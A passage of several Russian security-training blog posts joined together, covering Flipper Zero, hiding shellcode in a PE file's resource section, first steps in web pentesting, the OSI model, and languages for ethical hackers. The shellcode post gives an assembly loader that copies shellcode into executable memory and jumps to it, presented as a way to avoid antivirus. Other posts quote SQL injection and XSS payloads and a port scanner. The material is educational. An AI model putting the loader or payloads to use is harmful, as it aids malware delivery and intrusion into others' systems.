    <li>Запускает таймер, отсчитывающий 20-минутные интервалы;</li>
    <li>По истечении времени — подаёт сигнал (звуковой или визуальный) с напоминанием сделать паузу;</li>
    <li>Может отображать анимации или текст с рекомендацией отвести взгляд и расслабить зрение.</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/eye_saver.png"
     alt="Eye Saver">

<hr>
<blockquote>
    <p>
        <b>Читайте также:</b>
        <br>
        <a href="https://hackerlab.pro/blog/pervye-shagi-v-veb-penteste">Первые шаги в веб-пентесте</a>
        <br>
        <a href="https://hackerlab.pro/blog/osnovy-setey-dlya-nachinayushchih-v-ib">Основы сетей</a>
        <br>
        <a href="https://hackerlab.pro/blog/top-10-instrumentov-dlya-nachinayushchego-hakera">Топ инструментов</a>
        <br>
        <a href="https://hackerlab.pro/blog/pe-shellcode-rsrc-vulnerability">Шелл-код в ресурсах PE</a>
    </p>
</blockquote>
<hr>

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>

<p>Физические устройства дают пентестеру совершенно новый уровень возможностей. Они позволяют не просто “взламывать из
    браузера”, а выходить в физическое пространство: подслушивать радиоэфир, читать карты доступа, взаимодействовать с
    ИК-датчиками и USB-портами.</p>

<p>Flipper Zero — отличный пример многофункционального и компактного устройства, которое может заменить сразу несколько
    инструментов. Благодаря открытой архитектуре, он быстро развивается и уже занял своё место в арсенале многих
    специалистов.</p>

<p>Но не стоит забывать — использование таких устройств вне рамок легального пентеста может нарушать закон. Поэтому все
    тесты, особенно с физическим вмешательством, должны проводиться только при наличии официального разрешения и
    согласия заказчика.</p>

</body>
</html>


Flipper Zero: универсальный гаджет для физического пентеста

Узнайте, как через секцию ресурсов PE-файла можно скрытно загружать и запускать шелл-код. Подробный разбор механизмов и примеры на WinAPI и ассемблере.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description"
          content="Узнайте, как злоумышленники используют секцию ресурсов PE-файла для внедрения и исполнения шелл-кодов. Анализ механизмов, WinAPI-функций и ошибок в системных библиотеках.">
    <meta name="keywords"
          content="PE-файл, секция ресурсов, .rsrc, уязвимости, шелл-код, WinAPI, загрузка ресурсов, VirtualAlloc, RCDATA, malware, reverse engineering">
    <title>Скрытые угрозы .rsrc: шелл-коды в секции ресурсов PE-файла</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>Секция .rsrc может таить в себе весьма коварные вещи, и в данном обзоре мы приоткроем этот "ящик Пандоры".</p>

<div data-toc="Общие сведения о ресурсах" id="general-information"></div>
<h3>Общие сведения о ресурсах</h3>

<p>Разбираясь с секцией ресурсов приходит осознание того, что «майки» будто специально предоставили нам легальное средство вызова шеллов из исполняемых файлов РЕ. Понятное дело в корне инженеры преследовали совсем иную цель, но в очередной раз получилось как всегда. А всё потому, что в погоне за прибылью Microsoft забыла о простой истине: «Чем проще устройство, тем стабильнее оно работает». С форматом-же РЕ файлов дела обстоят прямо противоположно. Код системного загрузчика образов «Image Loader» настольно раздут, что в нём можно запросто разместить слона.</p>

<p>Начнём с того, что имя любой секции не несет никакого метафизического смысла, и было введено исключительно из эстетических соображений. Поскольку системный загрузчик его игнорирует, мы можем пронумерировать свои секции хоть от 1 до N, и файл прекрассно отработает в памяти. Это потому, что лоадер ищет секции строго в каталоге «IMAGE_DATA_DIRECTORY» РЕ-заголовка, где лежат RVA-указатели (от ImageBase) на все из них. От сюда следует, что если мы хотим найти какую-нибудь секцию внутри жертвы, то ни в коем случае не должны делать ставку на стандартные имена, а искать только через каталог. Каждая запись в этом каталоге имеет размер 8 байт (4 для адреса + 4 под её размер). Всего имеется 16 таких записей, а секция-ресурсов всегда лежит под номером три – это представлено на скрине ниже:</p>

<img src="https://hackerlab.pro/game_api/articles/static/c8cb4c67-5f72-4164-98a6-b2bd8ed3f5e6/oleaut32.png" alt="oleaut32.dll">

<p>Зато некоторые вирусы/протекторы/упаковщики распознают личные секции только по ник-нэйму, и всякое искажение имени валит их наповал. Более того, даже прогеры из Microsoft допускают эту грубую ошибку в своих системных либах, например «<b>oleaut32.dll</b>» – она распознаёт секцию ресурсов файла по имени, а не по записи в «DATA_DIRECTORY». Дизассемблирование подтверждает, что она действительно содержит внутри себя текстовую строку ".rsrc" и активно её использует. </p>

<img src="https://hackerlab.pro/game_api/articles/static/c8cb4c67-5f72-4164-98a6-b2bd8ed3f5e6/oleaut32-error.png" alt="oleaut32.dll">

<p>Эта (на первый взгляд мелкая) ошибка приводит к тому, что если мы загружаем oleaut32.dll в своё приложение, то наша секция-ресурсов обязательно должна ходить под ником «RSRC», иначе в лучшем случае ресурсы могут быть проигнорированны, а в худшем софт вообще упадёт. Автора этой dll можно смело назвать идиотом, т.к. эту либу импортирует добрая половина и системных приложений, в результате чего имеем зависимость типа «снежный ком». Именно по этой причине буквально весь софт под Windows всегда оставляет оригинальное имя секции-ресурсов, чтобы случайно не нарваться на этот шип. Это касается и пакера UPX – он или вообще не трогает ресурсы, или-же оставляет их оригин.имя в своих нёдрах.</p>

<img src="https://hackerlab.pro/game_api/articles/static/c8cb4c67-5f72-4164-98a6-b2bd8ed3f5e6/smbios_v14_upx.png" alt="smbios_v14_upx.exe">

<blockquote>Если вас интересуют приёмы, позволяющие усложнить анализ и затруднить реверс, смотрите нашу статью <a href="https://hackerlab.pro/blog/kak-zashitit-parol-ot-reversa-antiotladka-xor-i-pryzhki-v-bezdnu" target="_blank">«Как защитить пароль от реверса: антиотладка, XOR и прыжки в бездну»</a></blockquote>

<div data-toc="Вызов шелл-кода из ресурсов" id="calling-shell-code"></div>
<h3>Вызов шелл-кода из ресурсов</h3>

<p>Секция ресурсов может содержать в себе следующие 20 типов данных, при этом большинство из них являются бинарными, как и сам шелл-код. Например нельзя физически отличить картинки, шрифты и анимацию от двоичного кода – в более критических случаях можно предварить шелл сигнатурой битпама *.bmp, и запускать его на исполнение не с первого байта тупо пропустив подложную сигнатуру:</p>

<pre>
RT_CURSOR         =  1    Курсор
RT_BITMAP         =  2    Растровое изображение
RT_ICON           =  3    Иконка приложения
RT_MENU           =  4    Меню приложения
RT_DIALOG         =  5    Диалоговое окно
RT_STRING         =  6    Запись в таблице строк
RT_FONTDIR        =  7    Каталог шрифтов
RT_FONT           =  8    Шрифт
RT_ACCELERATOR    =  9    Разделитель в меню
RT_RCDATA         =  10   Ресурс, определяемый приложением (RAW данные)
RT_MESSAGETABLE   =  11   Запись в таблице сообщений
RT_GROUP_CURSOR   =  12   Аппаратно-независимый курсор
RT_GROUP_ICON     =  14   Аппаратно-независимый ресурс значков
RT_VERSION        =  16   Версия приложения
RT_PLUGPLAY       =  19   Ресурс Plug & Play
RT_VXD            =  20   VxD (Virtual Device Driver, только для Win9x)
RT_ANICURSOR      =  21   Анимированный курсор
RT_ANIICON        =  22   Анимированная иконка
RT_HTML           =  23   HTML-ресурс
RT_MANIFEST       =  24   Данные манифеста приложения
</pre>

<p>Список-же функций WinAPI для работы с ресурсами вообще состоит из ~10 тушканчиков – графику мы можем загружать напрямую через <b>LoadBitmap/Icon/ImageString()</b>, а остальные нужно искать по идентификаторам внутри секции через <b>FindResource()</b> с последующим <b>LoadResource()</b>.</p>

<pre>
LoadBitmap
LoadIcon
LoadImage
LoadString

FindResource
SizeofResource
LoadResource
</pre>

<p>Тонкости программирование шелл-кодов выходит за рамки статьи, и может мы ещё вернёмся к этому вопросу, а пока рассмотрим вариант его запуска из ресурсов РЕ-файла. Проблема в том, что в атрибутах секции ресурсов нет флага «Исполняемая», и если авер обнаружит таковой, то сразу отправит файл на карантин. Поэтому наша задача найти указатель на тушку шелла через <b>Find/LoadResource()</b>, далее загрузить шелл в заранее выделенную <b>VirtualAlloc()</b> память с атрибутами <b>PAGE_EXECUTE_READWRITE</b>, и наконец стартануть его с чистой совестью. На языке ассемблера это выглядит примерно так – будем считать, что «ID_SHELL» это идентификатор ресурса, а «shell.bin» это сам шелл-кол:</p>

<pre>
.data
shRes   dd  0
shSize  dd  0
shData  dd  0
;//-----------------

.code
invoke  FindResource,  0, ID_SHELL, ’shell.bin’
mov     [shRes],eax
invoke  SizeofResource,0, eax
mov     [shSize],eax
invoke  LoadResource,  0, eax
mov     [shData],eax

invoke  VirtualAlloc,  0, eax, MEM_COMMIT, PAGE_EXECUTE_READWRITE
push    eax
invoke  WriteProcessMemory, -1, eax, [shData], [shSize], 0
pop     eax
jmp     eax
</pre>

<p>Однако есть и более изящный способ заключающийся в том, что в арсенале WinAPI имеется не только функция загрузки, но и перечисления ресурсов по их типам <b>EnumResourceTypes()</b>. То-есть мы задаём своему шеллу тип <b>RT_RCDATA=10</b> (сырые данные без формата), после чего ищем их в секции-ресурсов. Плюс такого подхода в том, что одним из параметров данной функции является указатель на обратный вызов «Callback», внутри которого мы уже тянем за шелл. Если из колбека мы вернём EAX=0, то поиск прекратиться. Как правило колбеки имеют все функции WinAPI с префиксом <b>Enum_XX()</b>.</p>

<pre>
EnumResourceLanguages
EnumResourceNames
EnumResourceTypes

BOOL EnumResourceTypesA(
  [in,opt] HMODULE     hModule,
  [in]     Callback    lpEnumFunc,
  [in]     LONG_PTR    lParam
);
</pre>

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>

<p>Два описанных выше метода имеют один важный недостаток – это вызов API-функций, от которых хорошо-бы избавиться. Если учесть, что имеем указатель на секцию-ресурсов в записи(3) «IMAGE_DATA_DIRECTORY», то остаётся вручную пропарсить всю секцию в поисках нужного нам ресурса. Однако это анулирует только функции <b>Find/LoadResource()</b>, а выделять исполняемую память через <b>VirtualAlloc()</b> с последующим копированием туда шелла придётся по любому посредством WinAPI.</p>

<blockquote>Чтобы увидеть, как подобные методы применяются в CTF-задачах и учебных кейсах, рекомендуем прочитать <a href="https://hackerlab.pro/blog/ctf-zadaniya-2025-ot-idei-do-deploja-polnyj-gajd" target="_blank">«CTF-задания 2025: от идеи до деплоя — полный гайд»</a>.</blockquote>

</body>
</html>


Скрытые угрозы ресурсов EXE: шелл-код внутри PE-файла

Платформы для практики в кибербезопасности — обзор лучших решений

От теории к практике: топ платформ по кибербезопасности

Изучаем безопасность веб-приложений: основные протоколы, типы уязвимостей, настройка Kali и практика на CTF.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description"
          content="Изучаем безопасность веб-приложений: основные протоколы, типы уязвимостей, настройка Kali и практика на CTF.">
    <meta name="keywords"
          content="sql, веб-пентест, безопасность сайтов, pentest, xss, sql injection, ctf, изучение пентеста, кибербезопасность, hackerlab">
    <title>Первые шаги в веб-пентесте: от теории к практике</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>Допустим, вы хотите научиться искать уязвимости в сайтах и веб-приложениях, но не знаете, с чего начать. Как
    разобраться в HTTP-запросах? Зачем учить HTML и SQL? Какие навыки действительно нужны для веб-пентеста?</p>

<p>В этой статье - простая и честная инструкция для тех, кто хочет сделать первые шаги в безопасности веба. Без воды, на
    конкретных примерах.</p>

<p>В этой статье мы наглядно и поэтапно разберём каждый из семи уровней модели OSI через призму реального примера —
    загрузки сайта в браузере. Мы покажем, какие технологии и протоколы работают на каждом уровне, какие уязвимости
    могут возникать, и почему знание этих нюансов критически важно для проведения тестирования на проникновение и
    обеспечения сетевой безопасности.</p>

<div data-toc="Что такое веб-пентест и зачем он нужен" id="web-pentest"></div>
<h3>Что такое веб-пентест и зачем он нужен</h3>

<p>Любая работа по тестированию на проникновение начинается с получения домена или ip адреса тестируемого ресурса, но
    что это такое?</p>

<p>Веб-пентест (Web Application Penetration Testing) - это проверка веб-приложения на уязвимости с помощью реальных
    атак. Цель - найти дыры в защите до того, как это сделает злоумышленник.</p>

<p>Пентест включает следующие этапы:</p>

<ul>
    <li><b>Разведка:</b> сбор информации о цели (домен, IP, CMS, поддомены, уязвимые параметры).</li>
    <li><b>Сканирование:</b> использование сканеров и ручной проверки для выявления слабых мест.</li>
    <li><b>Эксплуатация:</b> попытка использовать найденные уязвимости, чтобы получить доступ к данным или системе.</li>
    <li><b>Анализ результатов:</b> подтверждение наличия уязвимостей, оценка их критичности.</li>
    <li><b>Рекомендации:</b> формирование отчёта и предложений по устранению проблем.</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/ea23ee7f-37f9-4374-b64d-e7f418289c05/five-stages.png"
     alt="5 стадий пентеста">

<div data-toc="Что нужно знать перед стартом" id="before-starting"></div>
<h3>Что нужно знать перед стартом</h3>

<p>Чтобы начать тестировать веб-приложения, нужно понимать, как они устроены. Вот базовые темы, которые стоит
    освоить:</p>

<p><b>1. Как работает веб</b></p>
<ul>
    <li><b>HTTP, методы GET и POST</b> - позволяют понять, как формируются и отправляются запросы.</li>
    <li><b>Cookies и сессии</b> - критичны для понимания авторизации и XSS.</li>
    <li><b>Основы сети (IP, DNS, прокси, VPN)</b> - пригодятся при обходе ограничений и анализе трафика.</li>
</ul>

<p><b>2. Базовые технологии</b></p>
<ul>
    <li><b>HTML</b> - поможет находить скрытые поля, комментарии с секретами, параметры форм.</li>
    <li><b>JavaScript</b> - нужен для анализа клиентской логики и поиска XSS.</li>
    <li><b>SQL</b> - обязателен для понимания SQL-инъекций. Учите <b>SELECT, WHERE, UNION, INSERT</b>.</li>
</ul>

<p>Дополнительно полезно знать основы серверных языков: PHP, Node.js и др. Это поможет понять, как обрабатываются данные
    на стороне сервера.</p>

<div data-toc="Практика: с чего начать" id="practice"></div>
<h3>Практика: с чего начать</h3>

<p>Установка инструментов — это только начало. Настоящая практика начинается, когда вы начинаете <b>проверять, ломать, настраивать и ошибаться</b>. Вот с чего стоит начать новичку:</p>

<p><b>1. Разверните окружение для пентеста</b></p>

<ul>
    <li>Установите <b>Kali Linux</b> или <b>Parrot OS</b> — это дистрибутивы, в которых уже предустановлены десятки инструментов для анализа веб-приложений.</li>
    <li>Разверните их на виртуалке (VirtualBox или VMware), чтобы не рисковать основной ОС.</li>
    <li>Попробуйте использовать <b>Live-сессию</b> или <b>переносной установочный USB</b>, если не хотите ставить систему всерьёз.</li>
</ul>

<p><b>2. Освойтесь в терминале</b></p>
<p>Запомните базовые команды:</p>

<pre>ls, cd — навигация по каталогам
cat, nano — просмотр и редактирование файлов
grep — поиск нужной информации
</pre>

<p>Вы будете использовать их каждый день. Терминал — ваш основной инструмент.</p>

<p><b>3. Освойте базовые сканеры и утилиты</b></p>

<p>Начните с трёх ключевых:</p>

<ul>
    <li><b>nmap</b> — сканирование портов, сервисов, версии ПО</li>
    <li><b>Burp Suite</b> — перехват и модификация HTTP-трафика</li>
    <li><b>sqlmap</b> — автоматический поиск SQL-инъекций</li>
</ul>

<p><b>4. Настройте тренировочную цель</b></p>

<p>Без живой цели вы не научитесь ничему. Попробуйте:</p>

<ul>
    <li>Установить <b>DVWA (Damn Vulnerable Web App)</b> — сайт с уязвимостями внутри</li>
    <li>Поднять <b>OWASP Juice Shop</b> — современное SPA-приложение с кучей уязвимостей</li>
    <li>Использовать тренировочные машины с сайтов вроде HackTheBox или RootMe</li>
</ul>

<p>Для этого вам, скорее всего, придётся научиться работать с <b>VPN</b> и <b>локальными сетями</b>. Это полезный и важный навык в пентесте.</p>

<div data-toc="Популярные уязвимости, которые стоит изучить" id="popular-vulnerabilities"></div>
<h3>Популярные уязвимости, которые стоит изучить</h3>

<p>Вот список базовых, но критичных уязвимостей, с которых стоит начать:</p>

<ul>
    <li><b>SQL Injection (SQLi):</b> внедрение SQL-кода в запрос, например: <b>admin' OR '1'='1</b> - позволяет обойти логин или получить данные из базы.</li>
    <li><b>Cross-Site Scripting (XSS):</b> внедрение JavaScript-кода в поля ввода. Пример: <b>&lt;script&gt;alert('xss')&lt;/script&gt;</b> - может использоваться для кражи cookie или перехвата сессий.</li>
    <li><b>Cross-Site Request Forgery (CSRF):</b> атака, заставляющая пользователя выполнить нежелательное действие, будучи авторизованным.</li>
    <li><b>Remote Code Execution (RCE):</b> возможность исполнить произвольный код на сервере - самый опасный тип уязвимости.</li>
    <li><b>Server-Side Request Forgery (SSRF):</b> возможность заставить сервер отправить запрос к внутреннему ресурсу.</li>
</ul>

<div data-toc="Где тренироваться?" id="where-training"></div>
<h3>Где тренироваться?</h3>

<p>Чтение - хорошо, но навыки приходят только через практику. Лучшие способы прокачаться - CTF и тренировочные платформы:</p>

<ol>
    <li><a href="https://hackerlab.pro">HackerLab</a> - русскоязычная платформа с VPN-доступом, реальными стендами и курсами. Подробнее о формате соревнований и советах новичкам <a href="https://hackerlab.pro/blog/kak-nachat-uchastvovat-v-ctf-dlya-novichkov">читай в статье</a></li>
    <li><a href="https://www.hackthebox.com/" target="_blank">Hack The Box</a> - международная платформа с виртуальными машинами и заданиями.</li>
    <li><a href="https://www.root-me.org/" target="_blank">Root Me</a> - разнообразные задачи по всем направлениям ИБ.</li>
</ol>

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>

<p>Путь веб-пентестера - это постоянное обучение, тестирование, эксперименты. Начать можно с баз: разобраться в HTTP, научиться смотреть на сайт глазами атакующего и потренироваться на стендах.</p>

<p>Заходи на <a href="https://hackerlab.pro" target="_blank">HackerLab</a> и решай реальные задачи. Опыт приходит с практикой - и ты уже на верном пути.</p>

</body>
</html>


Первые шаги в веб-пентесте: от теории до практики

Разбираем уровни модели OSI на примере загрузки сайта. Почему сетевые знания — база для пентеста, аудита и любой работы в сфере информационной безопасности.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Основы сетей для начинающих в ИБ: без модели OSI ты слеп">
    <meta name="keywords"
          content="модель OSI, основы сетей, информационная безопасность, сети для новичков, пентест, сетевые протоколы, TCP/IP, ARP, уровни OSI, уязвимости сети">
    <title>Основы сетей для начинающих в ИБ: без модели OSI ты слеп</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>В современном мире информационной безопасности знание сетевых технологий — не просто преимущество, а жизненная
    необходимость. Каждый день специалисты сталкиваются с задачами анализа, защиты и тестирования сетей, и без понимания
    базовых принципов работы сетевого взаимодействия любые усилия становятся поверхностными. Одной из ключевых
    концепций, лежащих в основе сетевого обмена данными, является модель OSI, которая описывает, как именно информация
    проходит от пользователя до сервера и обратно.</p>

<p>В этой статье мы наглядно и поэтапно разберём каждый из семи уровней модели OSI через призму реального примера —
    загрузки сайта в браузере. Мы покажем, какие технологии и протоколы работают на каждом уровне, какие уязвимости
    могут возникать, и почему знание этих нюансов критически важно для проведения тестирования на проникновение и
    обеспечения сетевой безопасности.</p>

<div data-toc="Что такое домен и IP-адрес" id="domain-ip"></div>
<h3>Что такое домен и IP-адрес</h3>

<p>Любая работа по тестированию на проникновение начинается с получения домена или ip адреса тестируемого ресурса, но
    что это такое?</p>

<p>Домен — это удобочитаемое имя, которое скрывает за собой IP-адрес, уникальный идентификатор устройства в сети. Однако
    за этой, казалось бы, простой связкой скрывается сложная система взаимодействия устройств и протоколов, благодаря
    которым работает весь интернет и частные корпоративные сети.</p>

<p>Чтобы разобраться в этой системе и уметь находить в ней слабые места, специалисту по информационной безопасности
    необходимо чётко понимать, как именно происходит передача данных. Здесь на помощь приходит модель OSI (Open Systems
    Interconnection), которая описывает сетевое взаимодействие в виде семи логических уровней — от физических сигналов
    до приложений, с которыми взаимодействует пользователь.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-model.gif"
     alt="Сетевая модель OSI">

<div data-toc="Пример: загрузка сайта и уровни модели OSI" id="osi-model"></div>
<h3>Пример: загрузка сайта и уровни модели OSI</h3>

<p>Каждый уровень модели OSI отвечает за свой участок работы: физический уровень описывает передачу электрических
    сигналов, канальный отвечает за передачу кадров между соседними устройствами, сетевой — за маршрутизацию пакетов,
    транспортный — за надежность доставки, и так далее вплоть до прикладного уровня, где работают привычные нам
    протоколы вроде HTTP или SMTP, но давайте обо всем по порядку. Разберем ситуацию, с котором любой человек
    встречается каждый день – загрузка сайта в веб-браузере.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-l7.png"
     alt="L7. Прикладной уровень">

<p>Когда человек вводит адрес сайта в адресной строке, на самом верхнем, прикладном уровне, начинают работать такие
    протоколы, как DNS и HTTP или HTTPS. DNS нужен для того, чтобы преобразовать понятное человеку доменное имя в
    IP-адрес, который уже понимают машины. После этого формируется HTTP-запрос к серверу, и если соединение защищённое,
    используется HTTPS. На этом же уровне обрабатываются и другие прикладные протоколы, например SMTP при работе с
    электронной почтой или FTP для передачи файлов.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-l6.png"
     alt="L6. Уровень представления">

<p>Далее данные спускаются на уровень представления, который отвечает за шифрование и преобразование данных. Здесь в
    игру вступают протоколы TLS или SSL — именно они позволяют передавать информацию в зашифрованном виде, защищая её от
    перехвата и подмены. Если сайт использует HTTPS, на этом уровне устанавливается шифрованный канал связи между
    браузером и сервером.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-l5.png"
     alt="L5. Сеансовый уровень">

<p>После этого включается сеансовый уровень, который управляет установкой и поддержанием сессии. Благодаря ему
    соединение может оставаться активным определённое время, даже если часть данных передаётся фрагментами. На этом
    уровне происходит важный этап согласования параметров шифрования, обмен ключами и поддержка текущей сессии.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-l4.png"
     alt="L4. Транспортный уровень">

<p>Затем данные переходят на транспортный уровень, где основную роль играет протокол TCP. Он отвечает за надёжную
    доставку данных, разбиение их на сегменты, контроль правильности передачи и повторную отправку потерянных
    фрагментов. Благодаря этому пользователь видит целостную страницу, а не разрозненные куски кода.</p>

<p>Когда транспортный уровень завершает свою работу, данные попадают на сетевой уровень. Здесь начинает действовать
    IP-протокол, который отвечает за маршрутизацию: пакеты данных находят путь от вашего компьютера до сервера, минуя
    множество промежуточных маршрутизаторов и сетевых узлов.</p>

<p>После этого данные обрабатываются на канальном уровне. Этот уровень отвечает за передачу кадров между устройствами,
    находящимися в одной сети или находящимися на физически близком расстоянии. Здесь задействуются такие технологии,
    как Ethernet и протокол ARP, которые помогают определить, по какому физическому адресу отправить кадр в пределах
    локальной сети.</p>

<p>Наконец, на физическом уровне данные превращаются в электрические или оптические сигналы, либо в радиоволны в случае
    беспроводных сетей. Именно на этом уровне двоичный код превращается в импульсы, которые проходят по кабелям,
    оптоволокну или передаются по воздуху через Wi-Fi.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-model-dynamic.gif"
     alt="Физический уровень">

<div data-toc="Инкапсуляция и обратный процесс" id="encapsulation-and-reverse"></div>
<h3>Инкапсуляция и обратный процесс</h3>

<p>Когда данные доходят до сервера, весь процесс разворачивается в обратную сторону: сигналы снова превращаются в кадры,
    затем в пакеты, которые собираются в сегменты, проходят по сессии, расшифровываются, и наконец превращаются в ответ,
    который обрабатывается прикладным уровнем, этот процесс называется инкапсуляцией.</p>

<div data-toc="Уязвимости на каждом уровне модели OSI" id="vulnerabilities"></div>
<h3>Уязвимости на каждом уровне модели OSI</h3>

<p>Так как на каждом уровне используется большое количество технологий и устройств, для работы с ними возникает большое
    количество уязвимостей, которые можно найти только при понимании специфики работы каждого протокола. Например, если
    не разбираться в нюансах работы транспортного уровня, можно не заметить возможность манипулировать флагами TCP, что
    приводит к созданию различных атак, таких как TCP Reset или порт-сканирование с помощью stealth-методов. Непонимание
    особенностей сетевого уровня может скрыть от аудитора ошибки маршрутизации, которые позволяют злоумышленнику
    перехватывать трафик.</p>

<p>На канальном и физическом уровнях также встречаются уязвимости, связанные с подменой MAC-адресов, ARP-спуфингом или
    атакой через физический доступ к сетевым портам. А если подняться выше, до прикладного уровня, то здесь появляются
    ошибки в логике приложений, уязвимости в реализации протоколов, уязвимости в web-приложениях — всё это лишь верхушка
    айсберга.</p>

<div data-toc="Зачем специалисту по ИБ знать модель OSI" id="security-specialist"></div>
<h3>Зачем специалисту по ИБ знать модель OSI</h3>

<p>Именно поэтому глубокое понимание модели OSI и всех уровней взаимодействия — это не просто академическая теория, а
    важный инструмент для любого специалиста по безопасности. Разбираясь в том, как данные проходят путь от пользователя
    до сервера и обратно, как обрабатываются пакеты и каким образом происходят обмены сообщениями на каждом этапе, мы
    можем не только эффективнее находить и устранять уязвимости, но и более точно предсказывать возможные векторы
    атак.</p>

<p>В конечном счёте, знание сетевых основ превращает тестирование на проникновение из механического поиска в осмысленный
    и творческий процесс, который требует внимательности, гибкости и настоящего инженерного мышления.</p>

<blockquote>❗️Чтобы превратить теорию в реальные навыки, начните практиковаться на специализированных платформах. Мы собрали лучшие из них в отдельной статье -
    <a href="https://hackerlab.pro/blog/ot-teorii-k-praktike-top-platform-po-kiberbezopasnosti">От теории к практике: топ платформ по кибербезопасности</a></blockquote>

<blockquote>👉 Если OSI уже не пугает — пора идти дальше. Вот курс, с которого начинают хакеры и безопасники: <a
        href="https://codeby.school/catalog/kurs-kompyuternye-seti">«Компьютерные сети — от основ до практики»</a>
</blockquote>
</body>
</html>


Основы сетей для начинающих в ИБ: без модели OSI ты слеп

Антиотладка, обход CMP + JE, XOR и переходы по указателям — как надежно спрятать пароль в бинаре и усложнить жизнь реверс-инженеру.

Как защитить пароль от реверса: антиотладка, XOR и прыжки в бездну

Какие языки и инструменты нужны этичному хакеру: Bash, Python, Git, Regex и другие. Примеры задач, код и навыки, с которых стоит начать.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Какие языки программирования и инструменты нужно знать этичному хакеру — от Bash до Python, Git и Regex. Примеры, задачи и практика.">
    <meta name="keywords" content="этичный хакер, кибербезопасность, Bash, Python, Git, Regex, языки программирования, инструменты, сканер портов">
    <title>Языки и инструменты, которые должен знать этичный хакер</title>
</head>
<body>

<p>Когда слышишь слово «программирование», обычно вспоминаются сайты, игры или мобильные приложения. Но в кибербезопасности код нужен для другого — автоматизировать задачи, находить уязвимости, анализировать данные и тестировать системы на прочность.</p>


<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>Если ты хочешь стать хорошим специалистом по информационной безопасности, тебе нужно освоить хотя бы два инструмента:</p>
<ul>
    <li>один — для работы в терминале (чаще всего это Bash),</li>
    <li>второй — для написания утилит и скриптов (чаще всего Python).</li>
</ul>

<p>А дальше — больше. Ты познакомишься с десятком других технологий, которые помогут тебе в реальных атаках, расследованиях и автоматизации рутинных процессов: от Git и Regex до PowerShell и C.</p>

<h2>🔧 Где это применяется на практике?</h2>
<ul>
    <li>Проверка открытых портов сервера — Bash + nmap</li>
    <li>Создание фишинговых страниц — Python + Flask</li>
    <li>Подбор паролей к Wi-Fi — Bash + aircrack-ng</li>
    <li>Анализ дампов и логов — Python + re + pandas</li>
    <li>Поиск XSS в веб-приложении — JavaScript</li>
    <li>Работа с Active Directory — PowerShell</li>
    <li>Сбор данных с помощью OSINT — Python + Bash + парсинг</li>
    <li>Разработка вредоносного ПО на низком уровне — C, Assembly</li>
</ul>

<h2>💥 Мини-обзор: что должен знать этичный хакер</h2>
<table>
    <tr><th>Инструмент</th><th>Где и зачем используется</th></tr>
    <tr><td><b>Bash</b></td><td>Автоматизация атак, работа в Linux, сканеры, логика CLI</td></tr>
    <tr><td><b>Python</b></td><td>Эксплойты, фреймворки, автоматизация анализа и сбора данных</td></tr>
    <tr><td><b>JavaScript</b></td><td>XSS, DOM Clobbering, фишинг, браузерные атаки</td></tr>
    <tr><td><b>C/C++</b></td><td>Эксплойты низкого уровня, драйверы, работа с памятью</td></tr>
    <tr><td><b>Go</b></td><td>Создание быстрых и переносимых CLI-инструментов и C2-серверов</td></tr>
    <tr><td><b>PowerShell</b></td><td>Взлом и администрирование в Windows-средах, работа с AD</td></tr>
    <tr><td><b>PHP</b></td><td>Разработка бэкдоров, веб-шеллов, эксплуатация уязвимостей</td></tr>
    <tr><td><b>SQL</b></td><td>SQL-инъекции, дампы баз, обход авторизации</td></tr>
    <tr><td><b>Assembly</b></td><td>Реверс-инжиниринг, бинарная эксплуатация, анализ вредоносов</td></tr>
    <tr><td><b>Git</b></td><td>Контроль версий, безопасное хранение и обмен кодом</td></tr>
    <tr><td><b>Regex</b></td><td>Поиск данных по шаблону в логах, дампах, HTML</td></tr>
</table>

<div data-toc="Bash — язык терминала" id="bash"></div>
<h3>Bash — язык терминала</h3>
<p><b>Bash</b> — один из главных инструментов в Kali Linux и других дистрибутивах. Он позволяет автоматизировать сканирование, запуск эксплойтов, работу с файлами, логами, сетями.</p>
<pre><code>for ip in 192.168.1.{1..5}; do
  ping -c 1 $ip
done</code></pre>
<p>Этот скрипт пингует адреса от 192.168.1.1 до 192.168.1.5. Измени диапазон — и адаптируй под свою сеть.</p>

<div data-toc="Python — универсальный инструмент" id="python"></div>
<h3>Python — универсальный инструмент</h3>
<p><b>Python</b> — язык номер один среди этичных хакеров. Он подходит для написания эксплойтов, фреймворков, веб-интерфейсов, анализа данных и автоматизации всего, что можно.</p>
<pre><code>import socket

for port in range(1, 101):
    try:
        s = socket.socket()
        s.settimeout(0.5)
        s.connect(("127.0.0.1", port))
        print(f"Порт {port} открыт")
        s.close()
    except:
        pass</code></pre>
<p>Добавь логирование, потоки, отчёты — и получится готовый сканер портов.</p>

